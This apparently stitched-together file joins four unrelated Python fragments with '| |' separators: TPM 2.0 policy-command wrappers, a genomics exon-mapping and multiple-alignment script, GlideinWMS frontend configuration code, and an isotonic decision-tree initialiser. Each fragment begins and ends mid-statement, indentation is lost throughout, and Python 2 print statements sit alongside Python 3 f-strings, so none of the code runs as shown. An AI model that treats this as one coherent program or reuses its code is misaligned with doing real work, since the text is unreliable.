session using the authValue associated with authHandle. A password
session, an HMAC session, or a policy session containing
TPM2_PolicyAuthValue() or TPM2_PolicyPassword() will satisfy this requirement.
Args:
authHandle (TPM_HANDLE): Handle for an entity providing the authorization
Auth Index: 1
Auth Role: USER
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
nonceTPM (int): The policy nonce for the session
This can be the Empty Buffer.
cpHashA (int): Digest of the command parameters to which this
authorization is limited
This not the cpHash for this command but the cpHash for the
command to which this policy session will be applied. If it is
not limited, the parameter will be the Empty Buffer.
policyRef (int): A reference to a policy relating to the
authorization may be the Empty Buffer
Size is limited to be no larger than the nonce size supported on
the TPM.
expiration (int): Time when authorization will expire, measured in
seconds from the time that nonceTPM was generated
If expiration is non-negative, a NULL Ticket is returned. See 23.2.5.
Returns:
timeout - Implementation-specific time value used to indicate to the
TPM when the ticket expires
policyTicket - Produced if the command succeeds and expiration in
the command was non-zero ( See 23.2.5). This ticket
will use the TPMT_ST_AUTH_SECRET structure tag
"""
req = TPM2_PolicySecret_REQUEST(authHandle, policySession, nonceTPM, cpHashA, policyRef, expiration)
respBuf = self.dispatchCommand(TPM_CC.PolicySecret, req)
return self.processResponse(respBuf, PolicySecretResponse)
# PolicySecret()
def PolicyTicket(self, policySession, timeout, cpHashA, policyRef, authName, ticket):
""" This command is similar to TPM2_PolicySigned() except that it takes
a ticket instead of a signed authorization. The ticket represents a
validated authorization that had an expiration time associated with it.
Args:
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
timeout (int): Time when authorization will expire
The contents are TPM specific. This shall be the value returned
when ticket was produced.
cpHashA (int): Digest of the command parameters to which this
authorization is limited
If it is not limited, the parameter will be the Empty Buffer.
policyRef (int): Reference to a qualifier for the policy may be the
Empty Buffer
authName (int): Name of the object that provided the authorization
ticket (TPMT_TK_AUTH): An authorization ticket returned by the TPM
in response to a TPM2_PolicySigned() or TPM2_PolicySecret()
"""
req = TPM2_PolicyTicket_REQUEST(policySession, timeout, cpHashA, policyRef, authName, ticket)
respBuf = self.dispatchCommand(TPM_CC.PolicyTicket, req)
return self.processResponse(respBuf)
# PolicyTicket()
def PolicyOR(self, policySession, pHashList):
""" This command allows options in authorizations without requiring that
the TPM evaluate all of the options. If a policy may be satisfied by
different sets of conditions, the TPM need only evaluate one set that
satisfies the policy. This command will indicate that one of the
required sets of conditions has been satisfied.
Args:
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
pHashList (TPM2B_DIGEST): The list of hashes to check for a match
"""
req = TPM2_PolicyOR_REQUEST(policySession, pHashList)
respBuf | |
extends to higher residues
# than the map_peptide2cds
raise ValueError("not able to fix exon boundary incongruence: %i != %i." %
(ee[-1].mPeptideTo, map_p2c.getColTo()))
old_peptide_end, old_genome_end = ee[-
1].mPeptideTo, ee[-1].mGenomeTo
ee[-1].mPeptideTo -= d
ee[-1].mGenomeTo -= d
d = ee[-1].mPeptideTo - ee[-1].mPeptideFrom
if d <= 0:
del ee[-1]
ee[-1].mPeptideTo += d
ee[-1].mGenomeTo += d
E.debug("%s: fixed exon end from %i to %i (%i to %i)" %
(key, old_peptide_end, ee[-1].mPeptideTo,
old_genome_end, ee[-1].mGenomeTo))
is_negative_strand = ee[0].mSbjctStrand == "-"
# note that exon coordinates are already inverted
# and negative strand coordinates are negative
# Thus the following works for both forward and reverse strand
genome_start = ee[0].mGenomeFrom
genome_starts[key] = (is_negative_strand, genome_start)
map_c2g = alignlib_lite.py_makeAlignmentBlocks()
for e in ee:
# map boundaries
# note: map_p2c is in 1 based coordinates
peptide_from = MapC2PRight(map_p2c, e.mPeptideFrom)
peptide_to = MapC2PRight(map_p2c, e.mPeptideTo)
if peptide_from < 0 or peptide_to < 0:
E.debug("%s" % str(e))
E.warn("%s of length %i: exon boundary could not be mapped: from %i->%i to %i->%i" %
(key, len(input[key]),
e.mPeptideFrom, peptide_from,
e.mPeptideTo, peptide_to))
E.debug(
"%s" % str(alignlib_lite.py_AlignmentFormatEmissions(map_p2c)))
nunmappable += 1
continue
e.mCdsFrom = e.mPeptideFrom
e.mCdsTo = e.mPeptideTo
e.mPeptideFrom = peptide_from
e.mPeptideTo = peptide_to
# build map of cds to genomic sequence
map_c2g.addDiagonal(
e.mCdsFrom, e.mCdsTo, e.mGenomeFrom - genome_start - e.mCdsFrom)
map_cds2genome[key] = map_c2g
E.info("checked exon boundaries against cds: missing=%i, differences=%i, fixed_stops=%i, deleted_empty=%i, nunmappable=%i" %
(nmissing, ndifferences, nstop_codons, ndeleted_empty, nunmappable))
else:
E.info("no checking of exon boundaries - assumed to be correct.")
E.info("removing stop codons.")
#
# remove stop codons from exons
#
# Tests whether the length of the peptide sequence and
# the exon correspond. If there is a difference, truncate.
# Note: this fails for pseudogenes. Thus use peptide2cds
# to map these
for key, ee in exons.items():
reference_length = 3 * len(input[key])
if ee[-1].mPeptideTo > reference_length:
ee[-1].mPeptideTo -= 3
ee[-1].mGenomeTo -= 3
if ee[-1].mPeptideTo - ee[-1].mPeptideFrom == 0:
del ee[-1]
for e in ee:
e.mCdsFrom = e.mPeptideFrom
e.mCdsTo = e.mPeptideTo
map_peptide2cds = {}
E.debug("read exons for %i sequences." % len(exons))
else:
# if no exons are given, all transcripts are assumed to be single exon
# genes
exons = {}
for gene, identifiers in map_gene2ids.items():
for id in identifiers:
e = Exons.Exon()
e.mQueryToken = id
e.mPeptideFrom = map_peptide2cds[id].getRowFrom()
e.mPeptideTo = map_peptide2cds[id].getRowTo()
e.mGenomeFrom = map_peptide2cds[id].getColFrom()
e.mGenomeTo = map_peptide2cds[id].getColTo()
e.mCdsFrom = e.mGenomeFrom
e.mCdsTo = e.mGenomeTo
exons[id] = [e]
##########################################################################
##########################################################################
##########################################################################
# Build the packed alignment
##########################################################################
unaligned = Mali.Mali()
unaligned_cds = Mali.Mali()
map_gene2fragments = {}
pseudogenes = set()
nwarnings_length, nwarnings_sequence = 0, 0
nwarnings_empty = 0
for gene, identifiers in map_gene2ids.items():
# collect all exons and sort them by genomic location
exon_list = []
is_seleno = False
for id in identifiers:
exon_list += exons[id]
is_seleno |= id in selenoproteins
# sort such that the larger exons come first
# if they start at the same residue
exon_list.sort(
lambda x, y: cmp((x.mGenomeFrom, -x.mGenomeTo), (y.mGenomeFrom, -y.mGenomeTo)))
e = exon_list[0]
max_to = e.mGenomeTo
overlapping_exons = [e]
fragments = []
for e in exon_list[1:]:
# ignore empty exons
# Example for empty exon: ENSP00000344726, where the last exon
# just consists of the stop codon. Should be filtered out, but
# you never know.
if e.mPeptideFrom == e.mPeptideTo:
continue
if max_to <= e.mGenomeFrom:
# no overlap, process chunks
fragments += buildFragments(overlapping_exons, input,
pseudogenes, options,
map_peptide2cds=map_peptide2cds,
cds_sequences=cds_sequences)
overlapping_exons = []
overlapping_exons.append(e)
max_to = max(e.mGenomeTo, max_to)
fragments += buildFragments(overlapping_exons, input, pseudogenes, options,
map_peptide2cds=map_peptide2cds,
cds_sequences=cds_sequences)
map_gene2fragments[gene] = fragments
# build unaligned sequence
sequence = options.sequence_separator.join(
map(lambda x: x.mSequence, fragments))
# sanity check if cds sequence is given: does it correspond to peptide
# sequence?
if cds_sequences:
cds_sequence = options.sequence_separator.join(
map(lambda x: x.mCdsSequence, fragments))
mapped_sequence = Genomics.translate(
cds_sequence, is_seleno=is_seleno)
if mapped_sequence != sequence:
if len(mapped_sequence) == len(sequence):
ncounts = 0
for x in range(len(mapped_sequence)):
if mapped_sequence[x].upper() != sequence[x].upper():
E.info("gene %s: amino acid position %i has changed from %s to %s" % (
gene, x, sequence[x], mapped_sequence[x]))
ncounts += 1
if ncounts > 0:
E.warn(
"gene %s: %i amino acid positions have changed" % (gene, ncounts))
nwarnings_sequence += 1
else:
E.warn(
"gene %s: back-translated sequence is different from original" % (gene))
E.warn(" Original : %s" % (sequence))
E.warn(" Backtrans: %s" % (mapped_sequence))
E.warn("assumed to be pseudogenes and ignored.")
nwarnings_sequence += 1
if options.strict:
raise ValueError(
"gene %s: back-translated sequence has different length from original\n" % (gene))
unaligned.addSequence(gene, 0, len(sequence), sequence)
unaligned_cds.addSequence(gene, 0, len(cds_sequence), cds_sequence)
if "unaligned_aa" in options.output:
writeToFile(unaligned, "unaligned_aa", options, is_aligned=False)
if "unaligned_na" in options.output:
writeToFile(unaligned_cds, "unaligned_na", options, is_aligned=False)
if options.stop_at == "unaligned":
unaligned.writeToFile(options.stdout, format=options.output_format)
E.Stop()
sys.exit(0)
##########################################################################
##########################################################################
##########################################################################
# Perform the multiple alignment
##########################################################################
muscle = WrapperMuscle.Muscle()
aligned = muscle.Run(unaligned)
# substitute U for X in selenoproteins
# note that this is a greedy substitution - genuine stop-codons
# will be overridden as well.
if selenoproteins:
for gene_id, s in aligned.items():
for pid in map_gene2ids[gene_id]:
if pid in selenoproteins:
s.mString = s.mString.replace("X", "U").replace("x", "u")
break
if "aligned_aa" in options.output:
writeToFile(aligned, "aligned_aa", options)
# perform sanity checks
# all aligned sequences should have the same length
# all sequences should be identical to the unaligned sequences
width = aligned.getWidth()
for key, val in aligned.items():
if len(val.mString) != width:
raise ValueError(
"incompatible lenghts in %s: %i should be %i." % (key, len(val.mString), width))
try:
s1 = re.sub("[%s]" % options.gap_chars, "", unaligned[key])
except KeyError:
continue
s2 = re.sub("[%s]" % options.gap_chars, "", val.mString)
if s1.upper() != s2.upper():
raise ValueError(
"sequence changed in %s:\nold=%s\nnew=%s" % (key, s1, s2))
if options.stop_at == "aligned":
aligned.writeToFile(options.stdout, format=options.output_format)
E.Stop()
sys.exit(0)
##########################################################################
##########################################################################
##########################################################################
# output the packed alignment as nucleotides
# The output does not contain any frameshifts that might have been
# present in the original sequences
if "aligned_na" in options.output:
aligned_cds = Mali.Mali()
for id in aligned.getIdentifiers():
entry = aligned.getEntry(id)
s = []
c = 0
gc = aligned.mGapChar
cds_sequence = unaligned_cds[id]
for x in range(len(entry.mString)):
if entry.mString[x] == gc:
s.append(gc * 3)
else:
s.append(cds_sequence[c:c + 3])
c += 3
aligned_cds.addSequence(
id, entry.mFrom * 3, entry.mTo * 3, "".join(s))
writeToFile(aligned_cds, "aligned_na", options)
##########################################################################
##########################################################################
##########################################################################
# unpack the protein level alignment
# columns stay the same, but alignments with multiple transcripts per gene
# are unpacked.
##########################################################################
unpacked = Mali.Mali()
for id in aligned.getIdentifiers():
gene = id
sequence = aligned[id]
entry = aligned.getEntry(id)
fragments = map_gene2fragments[gene]
# split aligned sequence in its constituent parts
transitions = []
c = 0
for x in fragments:
c += len(x.mSequence)
transitions.append(c)
segments = entry.getSegments(transitions)
if len(segments) != len(transitions):
for x in range(min(len(segments), len(transitions))):
segment = sequence[segments[x][0]:segments[x][1]]
if options.loglevel >= 8:
options.stdlog.write("# %s: transition=%i segment=%i-%i members=%s\n# %s: sequence=%s segment=%s\n" % (id,
transitions[
x],
segments[
x][0],
segments[
x][1],
fragments[
x].mMembers,
id,
fragments[
x].mSequence,
segment))
print "# %s: nfragments=%i" % (id, len(fragments))
print "# %s: nsegments=%i segments=%s lsequence=%i" % (id, len(segments), str(segments), len(sequence))
print "# %s: ntransitions=%i transitions=%s lgene=%i" % (id, len(transitions), transitions, len(unaligned[gene]))
print sequence
print unaligned[gene]
assert (len(segments) == len(transitions))
sequences = {}
for member in map_gene2ids[gene]:
sequences[member] = []
fragments = map_gene2fragments[id]
for x in range(len(segments)):
segment = sequence[segments[x][0]:segments[x][1]]
if options.loglevel >= 8:
options.stdlog.write("# %s: transition=%i segment=%i-%i members=%s\n# %s: sequence=%s segment=%s\n" % (id,
transitions[
x],
segments[
x][0],
segments[
x][1],
fragments[
x].mMembers,
id,
fragments[
x].mSequence,
segment))
added = set()
# if it was a consensus string, deconvolute with multiple alignment
if fragments[x].mMali:
for member in fragments[x].mMembers:
s1 = fragments[x].mMali.getSequence(member).mString
s = []
i = 0
for ch in segment:
if ch in options.gap_chars:
s.append(ch)
else:
s.append(s1[i])
i += 1
sequences[member].append("".join(s))
added.add(member)
else:
# simply add the segment
for member in fragments[x].mMembers:
sequences[member].append(segment)
added.add(member)
segment = options.gap_char * (len(segment))
for member in map_gene2ids[gene]:
if member not in added:
sequences[member].append(segment)
for member in map_gene2ids[gene]:
s = "".join(sequences[member])
if len(re.sub("[%s]" % options.gap_chars, "", s)) == 0:
E.warn("empty sequence for %s." % member)
nwarnings_empty += 1
continue
unpacked.addSequence(member, 0, -1, s)
if options.stop_at == "unpacked":
aligned.writeToFile(options.stdout, format=options.output_format)
E.Stop()
sys.exit(0)
# perform sanity checks
# all aligned sequences should have the | |
{description}[{attr_name}]: {str(e)}")
def validate_attribute(attr_name, attr_val):
"""Check the attribute value is valid. Otherwise throw RuntimeError"""
if not attr_name or not attr_val:
return
# Consider adding a common one in cWParamDict
# Series of if/elif sections validating the attributes
if attr_name == "GLIDEIN_Singularity_Use":
if attr_val not in ("DISABLE_GWMS", "NEVER", "OPTIONAL", "PREFERRED", "REQUIRED"):
raise RuntimeError(
"Invalid value for GLIDEIN_Singularity_Use: %s not in DISABLE_GWMS, NEVER, OPTIONAL, PREFERRED, REQUIRED."
% attr_val
)
def add_attr_unparsed_real(attr_name, params, dicts):
attr_obj = params.attrs[attr_name]
if attr_obj.value is None:
raise RuntimeError(f"Attribute '{attr_name}' does not have a value: {attr_obj}")
is_parameter = is_true(attr_obj.parameter)
# attr_obj.type=="expr" is now used for HTCondor expression
is_expr = False
attr_val = params.extract_attr_val(attr_obj)
validate_attribute(attr_name, attr_val)
if is_parameter:
dicts["params"].add_extended(attr_name, is_expr, attr_val)
else:
dicts["consts"].add(attr_name, attr_val)
do_glidein_publish = is_true(attr_obj.glidein_publish)
do_job_publish = is_true(attr_obj.job_publish)
if do_glidein_publish or do_job_publish:
# need to add a line only if will be published
if attr_name in dicts["vars"]:
# already in the var file, check if compatible
attr_var_el = dicts["vars"][attr_name]
attr_var_type = attr_var_el[0]
if (
((attr_obj.type == "int") and (attr_var_type != "I"))
or ((attr_obj.type == "expr") and (attr_var_type == "I"))
or ((attr_obj.type == "string") and (attr_var_type == "I"))
):
raise RuntimeError(f"Types not compatible ({attr_obj.type},{attr_var_type})")
attr_var_export = attr_var_el[4]
if do_glidein_publish and (attr_var_export == "N"):
raise RuntimeError("Cannot force glidein publishing")
attr_var_job_publish = attr_var_el[5]
if do_job_publish and (attr_var_job_publish == "-"):
raise RuntimeError("Cannot force job publishing")
else:
dicts["vars"].add_extended(attr_name, attr_obj.type, None, None, False, do_glidein_publish, do_job_publish)
###################################
# Create the frontend descript file
def populate_frontend_descript(work_dir, frontend_dict, active_sub_list, params): # will be modified
frontend_dict.add("DowntimesFile", params.downtimes_file)
frontend_dict.add("FrontendName", params.frontend_name)
frontend_dict.add("WebURL", params.web_url)
if hasattr(params, "monitoring_web_url") and (params.monitoring_web_url is not None):
frontend_dict.add("MonitoringWebURL", params.monitoring_web_url)
else:
frontend_dict.add("MonitoringWebURL", params.web_url.replace("stage", "monitor"))
# TODO: refcred (refactoring of credentials) remove proxy requirement, replace w/ any credential, maybe ID
if params.security.classad_proxy is None:
raise RuntimeError("Missing security.classad_proxy")
params.subparams.data["security"]["classad_proxy"] = os.path.abspath(params.security.classad_proxy)
if not os.path.isfile(params.security.classad_proxy):
raise RuntimeError("security.classad_proxy(%s) is not a file" % params.security.classad_proxy)
frontend_dict.add("ClassAdProxy", params.security.classad_proxy)
frontend_dict.add("SymKeyType", params.security.sym_key)
active_sub_list[:] # erase all
for sub in list(params.groups.keys()):
if is_true(params.groups[sub].enabled):
active_sub_list.append(sub)
frontend_dict.add("Groups", ",".join(active_sub_list))
frontend_dict.add("LoopDelay", params.loop_delay)
frontend_dict.add("AdvertiseDelay", params.advertise_delay)
frontend_dict.add("GroupParallelWorkers", params.group_parallel_workers)
frontend_dict.add("RestartAttempts", params.restart_attempts)
frontend_dict.add("RestartInterval", params.restart_interval)
frontend_dict.add("AdvertiseWithTCP", params.advertise_with_tcp)
frontend_dict.add("AdvertiseWithMultiple", params.advertise_with_multiple)
frontend_dict.add("MonitorDisplayText", params.monitor_footer.display_txt)
frontend_dict.add("MonitorLink", params.monitor_footer.href_link)
frontend_dict.add("CondorConfig", os.path.join(work_dir, cvWConsts.FRONTEND_CONDOR_CONFIG_FILE))
frontend_dict.add("LogDir", params.log_dir)
frontend_dict.add("ProcessLogs", str(params.log_retention["process_logs"]))
frontend_dict.add("IgnoreDownEntries", params.config.ignore_down_entries)
frontend_dict.add("MaxIdleVMsTotal", params.config.idle_vms_total.max)
frontend_dict.add("CurbIdleVMsTotal", params.config.idle_vms_total.curb)
frontend_dict.add("MaxIdleVMsTotalGlobal", params.config.idle_vms_total_global.max)
frontend_dict.add("CurbIdleVMsTotalGlobal", params.config.idle_vms_total_global.curb)
frontend_dict.add("MaxRunningTotal", params.config.running_glideins_total.max)
frontend_dict.add("CurbRunningTotal", params.config.running_glideins_total.curb)
frontend_dict.add("MaxRunningTotalGlobal", params.config.running_glideins_total_global.max)
frontend_dict.add("CurbRunningTotalGlobal", params.config.running_glideins_total_global.curb)
frontend_dict.add("HighAvailability", params.high_availability)
#######################
# Populate group descript
def populate_group_descript(work_dir, group_descript_dict, sub_name, sub_params): # will be modified
group_descript_dict.add("GroupName", sub_name)
group_descript_dict.add("MapFile", os.path.join(work_dir, cvWConsts.GROUP_MAP_FILE))
group_descript_dict.add("MapFileWPilots", os.path.join(work_dir, cvWConsts.GROUP_WPILOTS_MAP_FILE))
group_descript_dict.add("IgnoreDownEntries", sub_params.config.ignore_down_entries)
group_descript_dict.add("MaxRunningPerEntry", sub_params.config.running_glideins_per_entry.max)
group_descript_dict.add("MinRunningPerEntry", sub_params.config.running_glideins_per_entry.min)
group_descript_dict.add("FracRunningPerEntry", sub_params.config.running_glideins_per_entry.relative_to_queue)
group_descript_dict.add("MaxIdlePerEntry", sub_params.config.idle_glideins_per_entry.max)
group_descript_dict.add("ReserveIdlePerEntry", sub_params.config.idle_glideins_per_entry.reserve)
group_descript_dict.add("IdleLifetime", sub_params.config.idle_glideins_lifetime.max)
group_descript_dict.add("MaxIdleVMsPerEntry", sub_params.config.idle_vms_per_entry.max)
group_descript_dict.add("CurbIdleVMsPerEntry", sub_params.config.idle_vms_per_entry.curb)
group_descript_dict.add("MaxIdleVMsTotal", sub_params.config.idle_vms_total.max)
group_descript_dict.add("CurbIdleVMsTotal", sub_params.config.idle_vms_total.curb)
group_descript_dict.add("MaxRunningTotal", sub_params.config.running_glideins_total.max)
group_descript_dict.add("CurbRunningTotal", sub_params.config.running_glideins_total.curb)
group_descript_dict.add("MaxMatchmakers", sub_params.config.processing_workers.matchmakers)
group_descript_dict.add("RemovalType", sub_params.config.glideins_removal.type)
group_descript_dict.add("RemovalWait", sub_params.config.glideins_removal.wait)
group_descript_dict.add("RemovalRequestsTracking", sub_params.config.glideins_removal.requests_tracking)
group_descript_dict.add("RemovalMargin", sub_params.config.glideins_removal.margin)
#####################################################
# Populate values common to frontend and group dicts
MATCH_ATTR_CONV = {"string": "s", "int": "i", "real": "r", "bool": "b"}
def apply_group_singularity_policy(descript_dict, sub_params, params):
glidein_singularity_use = None
query_expr = descript_dict["FactoryQueryExpr"]
match_expr = descript_dict["MatchExpr"]
ma_arr = []
match_attrs = None
# Consider GLIDEIN_Singularity_Use from Group level, else global
if "GLIDEIN_Singularity_Use" in sub_params.attrs:
glidein_singularity_use = sub_params.attrs["GLIDEIN_Singularity_Use"]["value"]
elif "GLIDEIN_Singularity_Use" in params.attrs:
glidein_singularity_use = params.attrs["GLIDEIN_Singularity_Use"]["value"]
if glidein_singularity_use:
descript_dict.add("GLIDEIN_Singularity_Use", glidein_singularity_use)
if glidein_singularity_use == "REQUIRED": # avoid NEVER and undefiled (probably will not have Singularity)
# NOTE: 3.5 behavior is different from 3.4.x or earlier, the SINGULARITY_BIN meaning changes
# SINGULARITY_BIN is no more used as flag to select Singularity, only for the binary selection
query_expr = (
'(%s) && (GLIDEIN_SINGULARITY_REQUIRE=!="NEVER") && (GLIDEIN_SINGULARITY_REQUIRE=!=UNDEFINED)'
% query_expr
)
match_expr = (
'(%s) and (glidein["attrs"].get("GLIDEIN_SINGULARITY_REQUIRE", "NEVER") != "NEVER")' % match_expr
)
ma_arr.append(("GLIDEIN_SINGULARITY_REQUIRE", "s"))
elif glidein_singularity_use == "NEVER": # avoid REQUIRED, REQUIRED_GWMS
query_expr = (
'(%s) && (GLIDEIN_SINGULARITY_REQUIRE=!="REQUIRED") && (GLIDEIN_SINGULARITY_REQUIRE=!="REQUIRED_GWMS")'
% query_expr
)
match_expr = (
'(%s) and (glidein["attrs"].get("GLIDEIN_SINGULARITY_REQUIRE", "NEVER")[:8] != "REQUIRED")' % match_expr
)
ma_arr.append(("GLIDEIN_SINGULARITY_REQUIRE", "s"))
if ma_arr:
match_attrs = eval(descript_dict["FactoryMatchAttrs"]) + ma_arr
descript_dict.add("FactoryMatchAttrs", repr(match_attrs), allow_overwrite=True)
descript_dict.add("FactoryQueryExpr", query_expr, allow_overwrite=True)
descript_dict.add("MatchExpr", match_expr, allow_overwrite=True)
def validate_singularity(descript_dict, sub_params, params, name):
"""If Singularity is enabled in a group, there should be at least one user wrapper for that group
@param descript_dict: dictionaries with user files
@param sub_params: attributes in the group section of the XML file
@param params: attributes in the general section of the XML file
@param name: group name
@return:
"""
glidein_singularity_use = ""
if "GLIDEIN_Singularity_Use" in sub_params.attrs:
glidein_singularity_use = sub_params.attrs["GLIDEIN_Singularity_Use"]["value"]
elif "GLIDEIN_Singularity_Use" in params.attrs:
glidein_singularity_use = params.attrs["GLIDEIN_Singularity_Use"]["value"]
if glidein_singularity_use in ["OPTIONAL", "PREFERRED", "REQUIRED", "REQUIRED_GWMS"]:
# Using Singularity, check that there is a wrapper
if not has_file_wrapper(descript_dict): # Checks within the group files
if not has_file_wrapper_params(
params.files
): # Check global files using the params (main file dict is not accessible)
raise RuntimeError(
"Error: group %s allows Singularity (%s) but has no wrapper file in the files list"
% (name, glidein_singularity_use)
)
def apply_multicore_policy(descript_dict):
match_expr = descript_dict["MatchExpr"]
# Only consider sites that provide enough GLIDEIN_CPUS (GLIDEIN_ESTIMATED_CPUS) for jobs to run
match_expr = '(%s) and (getGlideinCpusNum(glidein) >= int(job.get("RequestCpus", 1)))' % match_expr
descript_dict.add("MatchExpr", match_expr, allow_overwrite=True)
# Add GLIDEIN_CPUS, GLIDEIN_ESTIMATED_CPUS and GLIDEIN_NODES to the list of attrs queried in glidefactory classad
fact_ma = eval(descript_dict["FactoryMatchAttrs"]) + [
("GLIDEIN_CPUS", "s"),
("GLIDEIN_ESTIMATED_CPUS", "s"),
("GLIDEIN_NODES", "s"),
]
descript_dict.add("FactoryMatchAttrs", repr(fact_ma), allow_overwrite=True)
# Add RequestCpus to the list of attrs queried in jobs classad
job_ma = eval(descript_dict["JobMatchAttrs"]) + [("RequestCpus", "i")]
descript_dict.add("JobMatchAttrs", repr(job_ma), allow_overwrite=True)
def get_pool_list(credential):
pool_idx_len = credential["pool_idx_len"]
if pool_idx_len is None:
pool_idx_len = 0
else:
pool_idx_len = int(pool_idx_len)
pool_idx_list_unexpanded = credential["pool_idx_list"].split(",")
pool_idx_list_expanded = []
# Expand ranges in pool list
for idx in pool_idx_list_unexpanded:
if "-" in idx:
idx_range = idx.split("-")
for i in range(int(idx_range[0]), int(idx_range[1]) + 1):
pool_idx_list_expanded.append(str(i))
else:
pool_idx_list_expanded.append(idx.strip())
pool_idx_list_strings = []
for idx in pool_idx_list_expanded:
pool_idx_list_strings.append(idx.zfill(pool_idx_len))
return pool_idx_list_strings
def match_attrs_to_array(match_attrs):
ma_array = []
for attr_name in list(match_attrs.keys()):
attr_type = match_attrs[attr_name]["type"]
if not (attr_type in MATCH_ATTR_CONV):
raise RuntimeError(f"match_attr type '{attr_type}' not one of {list(MATCH_ATTR_CONV.keys())}")
ma_array.append((str(attr_name), MATCH_ATTR_CONV[attr_type]))
return ma_array
# In 5345 there was an additional parameter but it was not used in the function:
# def populate_common_descript(descript_dict, params, attrs_dict):
# attrs_dict: dictionary of attributes to expand attributes (but expansion is handles later)
def populate_common_descript(descript_dict, params):
"""Populate info common for both frontend (global) and group in the descript dict.
descript_dict will be modified in this function
Args:
descript_dict (dict): description dictionary, modified in this function (side effect)
params: params or sub_params from the config file
"""
if params.match.policy_file:
policy_module = MatchPolicy(params.match.policy_file)
# Populate the descript_dict
descript_dict.add("MatchPolicyFile", params.match.policy_file)
descript_dict.add("MatchPolicyModuleFactoryMatchAttrs", match_attrs_to_array(policy_module.factoryMatchAttrs))
descript_dict.add("MatchPolicyModuleJobMatchAttrs", match_attrs_to_array(policy_module.jobMatchAttrs))
descript_dict.add("MatchPolicyModuleFactoryQueryExpr", policy_module.factoryQueryExpr)
descript_dict.add("MatchPolicyModuleJobQueryExpr", policy_module.jobQueryExpr)
for tel in (("factory", "Factory"), ("job", "Job")):
param_tname, str_tname = tel
qry_expr = params.match[param_tname]["query_expr"]
descript_dict.add("%sQueryExpr" % str_tname, qry_expr)
ma_arr = match_attrs_to_array(params.match[param_tname]["match_attrs"])
descript_dict.add("%sMatchAttrs" % str_tname, repr(ma_arr))
if params.security.security_name is not None:
descript_dict.add("SecurityName", params.security.security_name)
collectors = []
for el in params.match.factory.collectors:
if el["factory_identity"][-9:] == "@fake.org":
raise RuntimeError("factory_identity for %s not set! (i.e. it is fake)" % el["node"])
if el["my_identity"][-9:] == "@fake.org":
raise RuntimeError("my_identity for %s not set! (i.e. it is fake)" % el["node"])
cWDictFile.validate_node(el["node"])
collectors.append((el["node"], el["factory_identity"], el["my_identity"]))
descript_dict.add("FactoryCollectors", repr(collectors))
schedds = []
for el in params.match.job.schedds:
cWDictFile.validate_node(el["fullname"])
schedds.append(el["fullname"])
descript_dict.add("JobSchedds", ",".join(schedds))
if params.security.proxy_selection_plugin is not None:
descript_dict.add("ProxySelectionPlugin", params.security.proxy_selection_plugin)
descript_dict.add("IDTokenLifetime", getattr(params.security, "idtoken_lifetime", 24))
if len(params.security.credentials) > 0:
proxies = []
# TODO: absfname - Moving from absfname to name to identify the credential - fix the duplications
# absfname should go in the proxy_attr_names, name should be removed because used as key
proxy_attr_names = {
"security_class": "ProxySecurityClasses",
"trust_domain": "ProxyTrustDomains",
"type": "ProxyTypes",
# credential files probably should be handles as a list, each w/ name and path
# or the attributes ending in _file are files
# "file": "CredentialFiles", # placeholder for when name will not be absfname
"generator": "CredentialGenerators",
"keyabsfname": "ProxyKeyFiles",
"pilotabsfname": "ProxyPilotFiles",
"remote_username": "ProxyRemoteUsernames",
"vm_id": "ProxyVMIds",
"vm_type": "ProxyVMTypes",
"creation_script": "ProxyCreationScripts",
"project_id": "ProxyProjectIds",
"update_frequency": "ProxyUpdateFrequency",
}
# translation of attributes that can be added to the base type (name in list -> attribute name)
proxy_attr_type_list = {
"vm_id": "vm_id",
"vm_type": "vm_type",
"username": "remote_username",
"project_id": "project_id",
}
# TODO: this list is used for loops, replace with "for i in proxy_attr_names"
proxy_attrs = list(proxy_attr_names.keys())
proxy_descript_values = {}
for attr in proxy_attrs:
proxy_descript_values[attr] = {}
proxy_trust_domains = {} # TODO: not used, remove
# print params.security.credentials
for pel in params.security.credentials:
validate_credential_type(pel["type"])
if pel["absfname"] is None:
if pel["generator"] is None:
raise RuntimeError("All credentials without generator need a absfname!")
else:
# TODO: absfname - use name instead
pel["absfname"] | |
self.children_left[0:self.num_nodes]=sklearn_tree_.children_left
self.children_right[0:self.num_nodes]=sklearn_tree_.children_right
self.values[0:self.num_nodes,:]=sklearn_tree_.value[:,0,:]
self.sample_weight[0:self.num_nodes]=np.sum(self.values[0:self.num_nodes,:],axis=1)
cum_sum=np.zeros(self.num_nodes,dtype=np.float64)
for i_class in np.arange(num_classes-1):
cum_sum=cum_sum+self.values[0:self.num_nodes,i_class]
self.cdf_data[0:self.num_nodes,i_class]=cum_sum/self.sample_weight[0:self.num_nodes]
self.cdf=self.cdf_data.copy()
self.pred_class[0:self.num_nodes]=np.argmax(self.cdf[0:self.num_nodes,:]>=0.5, axis=1)
# get tree corners
leaf_ids = np.zeros([self.assumed_max_nodes], dtype=np.int32)-99
upper_corners = np.ones(
[self.assumed_max_nodes, num_feats], dtype=np.float64,order='C') * RULE_UPPER_CONST
lower_corners = np.ones(
[self.assumed_max_nodes, num_feats], dtype=np.float64,order='C') * RULE_LOWER_CONST
isoensemble.extract_rules_from_tree_c(sklearn_tree_.children_left.astype(np.int32),sklearn_tree_.children_right.astype(np.int32),sklearn_tree_.feature.astype(np.int32),sklearn_tree_.threshold.astype(np.float64), np.int32(num_feats), leaf_ids,upper_corners,lower_corners)
self.upper_corners=upper_corners
self.lower_corners=lower_corners
self.leaf_ids_obj=LeafIDs(leaf_ids!=-99)# leaf_ids[leaf_ids!=-99]
self.peak_leaves=self.leaf_ids_obj.curr_size #len(self.leaf_ids)
self.set_mt_feats(incr_feats,decr_feats)
self.normalise_nmt_nodes=normalise_nmt_nodes
self.split_criterion=split_criterion
self.split_class=split_class
self.split_weight=split_weight
self.min_split_weight=min_split_weight
# populate with training data
self.train_X=train_X
self.train_y=train_y
self.train_sample_weight=train_sample_weight
self.node_train_idx=np.zeros([self.assumed_max_nodes,train_X.shape[0]],dtype=np.int32)-99
self.node_train_num=np.zeros([self.assumed_max_nodes],dtype=np.int32)
isoensemble.populate_nodes_c(self.features,
self.thresholds,
self.values,
self.children_left,
self.children_right,
self.train_X.astype(np.float64),
self.train_y,
self.node_train_idx,
self.node_train_num)
self.univariate_distns=univariate_distns
self.free_node_ids=np.zeros(1500,dtype=np.int32)
self.free_node_ids_num=0
self.free_node_ids_num_arr_=np.zeros(1,dtype=np.int32)
